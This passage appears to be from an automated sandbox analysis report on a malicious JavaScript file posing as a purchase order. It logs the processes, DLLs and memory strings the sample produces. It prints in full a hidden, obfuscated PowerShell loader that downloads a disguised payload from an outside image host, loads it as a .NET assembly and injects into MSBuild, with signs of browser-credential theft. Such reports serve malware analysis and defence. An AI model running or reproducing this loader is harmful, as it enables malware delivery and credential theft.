                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: MSBuild.exe, MSBuild.exe, 0000000C.00000002.2753023863.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: MSBuild.exe, 0000000B.00000002.2763609034.00000000032AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: MSBuild.exe, MSBuild.exe, 0000000B.00000002.2758427570.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: PO_0099822111ORDER.jsVirustotal: Detection: 14%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_0099822111ORDER.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.js
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" C:\Windows\Temp\???2????4????4????5.jsJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $forsakers = 'aQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAaQBmACAAKAAkAG4AdQBsAGwAIAAtAG4AZQAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlACAALQBhAG4AZAAgACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgAFsAdgBvAGkAZABdACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4AIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBPAHUAdABwAHUAdAAgACcAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAZQByAHMAaQBvAG4AIABOAG8AdAAgAGEAdgBhAGkAbABhAGIAbABlACcAIAB9ADsAJABtAGUAbQBvAHIAYQBuAGQAdQBtAHMAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAHkAdABmAGwAdAA2ADEAbgAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwAzADEAMwA0ADkANAA3AC8AYgBrAGwAcAB5AHMAZQB5AGUAdQB0ADQAaQBtAHAAdwA1ADAAbgAxAC4AagBwAGcAIAAnADsAJABjAG8AbgBlAG4AbwBzAGUAcwAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQAgAD0AIAAkAGMAbwBuAGUAbgBvAHMAZQBzAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAG0AZQBtAG8AcgBhAG4AZAB1AG0AcwApADsAJABlAGQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AbQBlAG0AbwByAGkAYQBsAGwAeQApADsAJAByAGUAcwBlAG4AdABpAHYAZQAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAbwB2AGUAcgBwAGEAYwBrACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHcAYQBsAGwAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAcgBlAHMAZQBuAHQAaQB2AGUAKQA7ACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAAPQAgACQAZQBkAC4ASQBuAGQAZQB4AE8AZgAoACQAbwB2AGUAcgBwAGEAYwBrACkAOwAkAHcAYQBsAGwAZQBkACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQBnAHQAIAAkAHcAYQBsAGwAZQBkADsAJAB3AGEAbABsAGUAZAAgACsAPQAgACQAcgBlAHMAZQBuAHQAaQB2AGUALgBMAGUAbgBnAHQAaAA7ACQAbABlAGcAYQB0AGkAbgBlACAAPQAgACQAaABpAGcAaABsAGkAZwBoAHQAZQBkACAALQAgACQAdwBhAGwAbABlAGQAOwAkAG0AZQB0AGUAbwByAGkAdABpAGMAIAA9ACAAJABlAGQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAdwBhAGwAbABlAGQALAAgACQAbABlAGcAYQB0AGkAbgBlACkAOwAkAG8AcgBjAGEAcwAgAD0AIAAtAGoAbwBpAG4AIAAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAFQAbwBDAGgAYQByAEEAcgByAGEAeQAoACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAgAH0AKQBbAC0AMQAuAC4ALQAoACQAbQBlAHQAZQBvAHIAaQB0AGkAYwAuAEwAZQBuAGcAdABoACkAXQA7ACQAcABlAHIAdgBhAHMAaQB2AGUAbgBlAHMAcwBlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbwByAGMAYQBzACkAOwAkAHMAeQBuAGkAegBlAHMAaQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$memorandums = 'https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg ';$conenoses = New-Object System.Net.WebClient;$immemorially = $conenoses.DownloadData($memorandums);$ed = [System.Text.Encoding]::UTF8.GetString($immemorially);$resentive = '<<BASE64_START>>';$overpack = '<<BASE64_END>>';$walled = $ed.IndexOf($resentive);$highlighted = $ed.IndexOf($overpack);$walled -ge 0 -and $highlighted -gt $walled;$walled += $resentive.Length;$legatine = $highlighted - $walled;$meteoritic = $ed.Substring($walled, $legatine);$orcas = -join ($meteoritic.ToCharArray() | ForEach-Object { $_ })[-1..-($meteoritic.Length)];$pervasivenesses = [System.Convert]::FromBase64String($orcas);$synizesis = [System.Reflection.Assembly]::Load($pervasivenesses);$vulcanisms = [dnlib.IO.Home].GetMethod('VAI');$vulcanisms.Invoke($null, @('0/tBcDi/r/ee.etsap//:sptth', 'constantan', 'constantan', 'constantan', 'MSBuild', 'constantan', 'constantan','constantan','constantan','constantan','constantan','constantan','1','constantan'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\hxihjvnzszludrvreijvqeqsb"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\rrvrknybgidhfxrdnswxtjkjbwnl"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /stext "C:\Users\user\AppData\Local\Temp\bmbkdyiuuqvmpdfhediqewfskcwuitz"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
